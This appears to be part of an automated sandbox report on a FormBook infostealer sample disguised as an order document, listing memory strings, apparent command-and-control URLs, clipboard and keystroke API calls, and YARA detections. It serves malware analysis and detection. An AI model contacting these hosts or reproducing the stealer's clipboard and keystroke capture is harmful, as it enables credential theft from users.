fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 03:16:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b

Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=1
Source: clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.bfiworkerscomp.com/px.js?ch=2
Source: clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=RVFsMXVZQ01zWVBtemVpNk84WGZGRFNKclVyQWVYYVJiaVZY
Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4135732258.0000000005746000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc
Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4135732258.0000000005746000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10332
Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: clip.exe, 00000003.00000002.4132740210.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: clip.exe, 00000003.00000003.2055060671.000000000789A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png
Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png
Source: clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: clip.exe, 00000003.00000002.4134771184.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.0000000016C44000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH
Source: clip.exe, 00000003.00000002.4134771184.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.0000000016C44000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
Source: clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_009F425A

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_009F4458

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

0_2_009F425A

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_009E0219

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00A0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A0CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00983B4C
Source: MV Sunshine, ORDER.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: MV Sunshine, ORDER.exe, 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_22f29a9b-c
